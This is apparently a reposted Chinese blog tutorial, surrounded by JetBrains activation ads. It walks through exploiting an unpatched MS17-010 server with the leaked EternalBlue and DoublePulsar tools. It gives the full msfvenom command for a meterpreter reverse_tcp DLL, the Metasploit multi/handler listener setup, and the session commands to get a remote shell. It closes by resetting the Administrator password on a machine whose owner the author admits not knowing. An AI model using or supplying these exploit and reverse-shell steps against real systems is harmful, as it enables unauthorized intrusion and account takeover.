大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE稳定放心使用
1. 使用shadowbroker 的 eternalblue还有 doublepulsar 实现注入到目标机器的进程, 然后使用kali下的msf 获取到有病毒机器的shell 然后修改密码 查看问题等.
根据网上的教程来进行处理 以及复现等
教程地址:
http://blog.csdn.net/claygrit/article/details/77284739 http://blog.csdn.net/feier7501/article/details/8852113
1. 需要的环境以及软件:
1. 目标机器 10.24.11.117 公司内的服务器,未更新微软永恒之蓝MS17-010补丁。
2. Win7x86的机器 10.24.160.37 安装python2.6 安装pywin32 下载有shadowbroker-master的文件(包含 eternalblue 以及 doublepulsar)
3. kali linux 机器, 主要是生成payload以及进行远程控制。
2. 步骤
1. Win7x86的机器安装以及修改,
安装python2.6×86 修改环境变量
安装 pywin32
解压送 shadowbroker 的zip包 cd 到windows 目录下
根据fb.py 新增加空目录 listeneringports
以及根据shadowbroker 里面的文件 修改resource 目录以及修改logs目录
安装以及修改完成后。打开cmd
cd到shadowbroker…/windows的目录下 执行 fb.py
开始自行操作
输入target ip 地址 本次的例子中未 10.24.11.117
callback 的ip地址是 win7的攻击机自己 地址是 10.24.160.37
不适用重定向 输入 no
后面的自己选择 等着出来 fb> 就说明可以正常使用了
2. 在fb> 后进行输入
输入 use eternalblue
一路next即可 在 选择 delivery mechanism 时选择FB
提示 eternalblue successed 即可。
3. 创建payload
shell 到 kali linux中 执行命令
其中 LHOST输入的时kali linux 自己的地址 端口号 理论上随便一个即可 msfvenom 的命令一点都不清楚 这一块需要继续加强学习
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.24.160.38 LPORT=5555 -f dll>launcher.dll
需要将launcher.dll 放到 win7x86的攻击机机器上面。 例子中时 10.24.168.37 比如 放到c:\launcher.dll
4. 还是在kali中: 输入命令
msfconsole
打开msf框架,这里的目的 应该是开启监听 能够返回 上一步中生成的paylaod 在target ip 机器中的返回数据 用来操作被攻击的机器
主要命令 第一步 应嘎是使用handler
为什么 不知道。。。 命令为:
use exploit/multi/handler
然后输入上一步相同的参数内容
set LHOST 10.24.160.38 set LPORT 5555 set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
提示started 即可
5. 返回win7x86的攻击机器
应该还是在fb>的输入界面
直接输入 use doublepulsar
一路next即可 就是搞清楚时x86 还是x64的目标机器 以及正确选中 第三步中生成的launcher.dll的路径以及文件名
以及选择 rundll的模式 后输入路径
正常的话 会提示 doublepulsar succeeded 即可
6. 再次返回 kali
会提示 meterpreter session 1 opened 说明已经建立了链接
回车会发现 还是会进入msf 的命令行
这个时候输入 sessions 显示已经打开的链接
然后执行命令 sessions -i 1 插入到链接中
这个时候 会发现命令提示符 会变成 meterpreter> 说明已经成功
这时 应该有很多挺好玩的玩法, 不过这里为了解决问题来搞的
所以这个时候 我选择输入 shell 会进入 c:\windows\system32\的命令行目录下 说明已经获取了 target 机器的shell权限
net user administrator newpassword 修改一下密码 自己就可以远程登录了。。
解决了 不知道是谁的机器 以及连不上的问题
这个地方有非常值得学习的地方msf 还有 shadowbroker 只是知道一点点的东西 还是太白了。。
转载于:https://www.cnblogs.com/jinanxiaolaohu/p/8524926.html
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/181367.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...